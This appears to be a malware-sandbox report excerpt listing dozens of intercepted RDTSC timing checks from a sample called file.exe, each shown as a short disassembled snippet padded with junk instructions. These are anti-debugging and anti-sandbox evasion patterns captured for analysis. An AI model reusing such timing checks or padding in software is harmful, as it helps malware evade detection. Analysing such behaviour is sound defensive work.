                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAD23C second address: DAD268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push edi 0x0000000b ja 00007FDA2529D366h 0x00000011 pop edi 0x00000012 jmp 00007FDA2529D376h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAD268 second address: DAD272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FDA252A1686h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAD272 second address: DAD276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB407 second address: DBB418 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A168Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB965B second address: DB9660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9660 second address: DB9666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9666 second address: DB96A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D376h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDA2529D378h 0x00000012 jmp 00007FDA2529D36Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9B0B second address: DB9B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9DA0 second address: DB9DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA039 second address: DBA04F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDA252A168Ch 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA04F second address: DBA067 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDA2529D372h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB2A2 second address: DBB2C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A1692h 0x00000007 jmp 00007FDA252A168Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB91D8 second address: DB91DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB91DC second address: DB91FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FDA252A1697h 0x0000000c jmp 00007FDA252A1691h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB91FD second address: DB9203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9203 second address: DB9207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE526 second address: DBE53C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FDA2529D366h 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c jo 00007FDA2529D382h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE53C second address: DBE540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFD1B second address: DBFD34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007FDA2529D36Eh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFD34 second address: DBFD38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D03870 second address: D0387A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1E53 second address: DC1E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1E57 second address: DC1E76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D36Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDA2529D36Dh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1E76 second address: DC1E7B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC58B2 second address: DC58D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA2529D36Ch 0x00000009 jmp 00007FDA2529D375h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC58D7 second address: DC58F0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDA252A1686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007FDA252A168Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC58F0 second address: DC58FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC58FF second address: DC5903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5903 second address: DC5917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FDA2529D36Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5A93 second address: DC5AA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A168Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5DD6 second address: DD5DE0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDA2529D366h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5DE0 second address: DD5DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FDA252A1691h 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5DFB second address: DD5E59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDA2529D36Eh 0x00000008 jng 00007FDA2529D366h 0x0000000e popad 0x0000000f jmp 00007FDA2529D375h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FDA2529D36Dh 0x0000001d pushad 0x0000001e jmp 00007FDA2529D378h 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 pop eax 0x00000027 push ebx 0x00000028 pop ebx 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5B12 second address: DD5B19 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5B19 second address: DD5B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5B22 second address: DD5B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5B26 second address: DD5B2C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD887B second address: DD888D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA252A168Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD888D second address: DD88B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA2529D36Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDA2529D375h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8272 second address: DD8276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8276 second address: DD8292 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDA2529D366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FDA2529D36Fh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8292 second address: DD82B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA252A1699h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDFE47 second address: DDFE4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDFE4F second address: DDFE53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7C3D second address: DE7C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7C4A second address: DE7C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7AE6 second address: DE7AEC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7AEC second address: DE7AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FDA252A1686h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE9E3B second address: DE9E76 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDA2529D366h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jmp 00007FDA2529D371h 0x00000012 pop edi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007FDA2529D379h 0x0000001c jmp 00007FDA2529D36Dh 0x00000021 jo 00007FDA2529D366h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEEACD second address: DEEAE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A168Eh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEEAE1 second address: DEEB07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA2529D371h 0x00000009 jmp 00007FDA2529D371h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEECAC second address: DEECB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEEFA6 second address: DEEFBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D373h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEEFBD second address: DEEFC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEEFC3 second address: DEEFCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDA2529D366h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEEFCD second address: DEEFD7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDA252A1686h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4AE1 second address: DF4B12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDA2529D36Dh 0x00000016 jmp 00007FDA2529D373h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4B12 second address: DF4B2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A1695h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4B2F second address: DF4B39 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDA2529D36Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF47C7 second address: DF4802 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A1694h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007FDA252A168Ch 0x0000000f jns 00007FDA252A1692h 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFBF44 second address: DFBF51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFD95B second address: DFD960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFD960 second address: DFD965 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFD965 second address: DFD96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFD96D second address: DFD97D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007FDA2529D366h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E12DCC second address: E12DDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007FDA252A168Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E12DDC second address: E12DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E12F40 second address: E12F4A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDA252A1686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E12F4A second address: E12F52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E12F52 second address: E12F58 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E224CA second address: E22511 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDA2529D368h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FDA2529D37Eh 0x00000012 jo 00007FDA2529D37Bh 0x00000018 jmp 00007FDA2529D373h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E22511 second address: E22517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E22517 second address: E2251B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2251B second address: E22526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E22A96 second address: E22AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FDA2529D374h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E233CB second address: E233E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A1697h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E233E8 second address: E233FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA2529D36Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E27897 second address: E278A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FDA252A1686h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490276 second address: 549027A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549027A second address: 549027E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549027E second address: 5490284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490284 second address: 5490299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A168Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490299 second address: 54902B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D379h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54902B6 second address: 54902BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54902BC second address: 54902C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54902C0 second address: 54902C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54902C4 second address: 54902E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FDA2529D376h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54902E9 second address: 5490343 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDA252A1698h 0x00000008 and eax, 3B9055D8h 0x0000000e jmp 00007FDA252A168Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov bx, cx 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FDA252A168Ch 0x00000023 or cl, 00000038h 0x00000026 jmp 00007FDA252A168Bh 0x0000002b popfd 0x0000002c popad 0x0000002d pop ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490343 second address: 5490347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490347 second address: 549034D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54903AD second address: 54903B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54903B3 second address: 54903E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A1694h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, cx 0x0000000e jmp 00007FDA252A168Ah 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54903E3 second address: 54903E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54903E7 second address: 54903EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54903EB second address: 54903F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54903F1 second address: 54903F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54903F7 second address: 54903FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54903FB second address: 54903FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47FCD second address: D47FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47FD1 second address: D47FE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A1691h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47FE6 second address: D47FEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47FEC second address: D47FFE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDA252A1686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
